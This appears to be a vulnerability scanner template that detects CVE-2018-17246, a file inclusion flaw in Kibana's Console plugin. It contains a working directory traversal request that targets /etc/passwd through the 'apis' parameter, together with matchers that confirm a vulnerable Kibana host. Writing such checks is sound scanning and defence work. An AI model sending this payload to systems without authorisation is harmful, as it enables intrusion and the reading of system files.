id: CVE-2018-17246 info: name: Kibana - Local File Inclusion author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 cwe-id: CWE-829 tags: cve,cve2018,lfi,kibana,vulhub metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - "\"message\":\"An internal server error occurred\"" - type: word part: header words: - "kbn-name" - "kibana" condition: or case-insensitive: true - type: word part: header words: - "application/json"